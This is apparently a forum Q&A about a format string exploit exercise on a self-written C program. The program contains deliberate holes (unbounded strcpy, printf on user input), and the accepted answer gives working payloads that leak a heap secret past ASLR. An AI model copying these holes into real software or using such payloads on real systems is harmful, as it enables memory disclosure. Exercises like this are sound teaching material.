# Format string exploit exercise

Tags: c, format-string

consider the following code:

```
#include <stdio.h>
#include <string.h>
#include <stdlib.h>

void vuln(char *user_input)
{
    char buf[128];

    strcpy(buf, user_input);
    printf(buf);
    printf("\n");

}

int main(int argc, const char * argv[]) {
    // insert code here...
    char *secret = (char *) malloc(5);
    strcpy(secret, "4067");
    printf("secret is at: %p\n", secret);
    vuln(argv[1]);
    return 0;
}
```

I compiled this code with the following command in gcc in Raspberry OS (RPi 3):

```
gcc -fno-stack-protector -z execstack format.c -o format
```

After which, I disabled ASLR on my Raspberry OS. The output of the program is as followed:

```
$ ./format AAAA
secret is at: 0x22150
AAAA
```

So in order to print the secret, I used the following:

```
$ ./format "\x50\x21\x02\x00 %x.%x.%x.%x.%s"
```

which gave me the following output:

```
$ ./format "\x50\x21\x02\x00 %x.%x.%x.%x.%s"
secret is at: 0x22150
\x50\x21\x02\x00 7e8d77eb.0.7e8d74a8.76f5a4f8.\x50\x21\x02\x00 %x.%x.%x.%x.%s
```

For some reason, %s printed the string but not the content as specified by the address \x50\x21\x02\x00. It used to work a few days ago but after performing an update, it does not work anymore. What can I do to make it work again?

Any advice would be appreciated.

Answer (score 1, accepted):

The key issue here is the null byte in the address: in your example above, the "secret" is stored at `0x00022150`, which when translated for endianess, is the string `\x50\x21\x02\x00` as you stated. Note the null byte at the end which is problematic for multiple reasons.

Primarily, strings in C are terminated with a null byte, meaning that `strcpy` will copy until the first null byte it sees, which would destroy the second half of your payload containing the `%x`. However, the null byte is not even passed to the binary: bash (and I believe other shells) does not like passing null bytes as arguments:

```
pi@raspberrypi:~/tmp$ ./format $(python3 -c 'print("A\x00b")')
-bash: warning: command substitution: ignored null byte in input
secret is at: 0x22190
Ab
```

You would not have observed the warning above because your raw hex bytes wern't translated properly either: note the difference in the two outputs below:

```
pi@raspberrypi:~/tmp$ python3 -c 'print("\x61\x62")' | hexdump
0000000 6261 000a
0000003
pi@raspberrypi:~/tmp$ python3 -c 'print(r"\x61\x62")' | hexdump
0000000 785c 3136 785c 3236 000a
0000009
```

As such, leaking `secret` with the format string bug here is a little challenging. However, if we were to consider that the pointer `secret` in `main` points to the heap location storing the secret, and that the fsb allows you dereference and print any data on the stack, we can simply tell `printf` to "hey, theres a string at **this** position on the stack", where **this** is the location of `secret`. To identify this, just dump the stack until you see the correct pointer:

```
pi@raspberrypi:~/tmp$ ./format $(python3 -c 'print("".join([f"%{i}$p." for i in range(30, 40)]))')
secret is at: 0x22190
0xbefffb34.0xb6eadd70.0xbefffb14.0x18c66100.0x1065c.0x10528.0x1065c.0x22190.0xbefffb34.0x1053c.
```

Note that we see `0x22190` being printed out. We can manually count the offset to, then dump the data at `0x22190`:

```
pi@raspberrypi:~/tmp$ ./format '%37$p'
secret is at: 0x22190
0x22190
pi@raspberrypi:~/tmp$ ./format '%37$s'
secret is at: 0x22190
4067
```

It is useful to note here that attempting to print an invalid memory address with `%s` will result in a segfault, hence here we tell it to only dereference and dump one address rather than all 10.

As a bonus, since we do not have to specify the actual address of `secret` in our payload, this method of attack also works with ASLR enabled.

```
pi@raspberrypi:~/tmp$ ./format '%37$s'
secret is at: 0xb84190
4067
pi@raspberrypi:~/tmp$ ./format '%37$s'
secret is at: 0x1c12190
4067
pi@raspberrypi:~/tmp$ ./format '%37$s'
secret is at: 0x1f66190
4067
pi@raspberrypi:~/tmp$ ./format '%37$s'
secret is at: 0x1a29190
4067
```